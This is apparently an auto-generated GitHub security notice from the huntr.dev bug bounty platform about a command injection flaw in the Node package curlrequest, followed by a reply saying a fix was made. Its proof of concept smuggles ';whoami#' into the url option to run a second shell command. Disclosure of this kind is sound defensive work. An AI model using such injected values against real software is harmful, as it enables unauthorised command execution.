Security Notice & Bug Bounty - Command Injection - huntr.dev

Question

Security Notice & Bug Bounty - Command Injection - huntr.dev

huntr-helper opened this issue 4 years ago · 1 comments

Overview

curlrequest is a curlrequest is a node wrapper for the command line curl.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the options values.

Proof of Concept

var curl = require("curlrequest");

let userPayload = ";whoami#";
curl.request({ url: userPayload, pretend: true }, function(err, stdout, meta) {
  console.log("%s %s", meta.cmd, meta.args.join(" "));
});

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

Answer 1 · 2020-06-17T15:46:39.000Z

‎‍🛠️ A fix has been provided for this issue. Please reference: 418sec#2

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.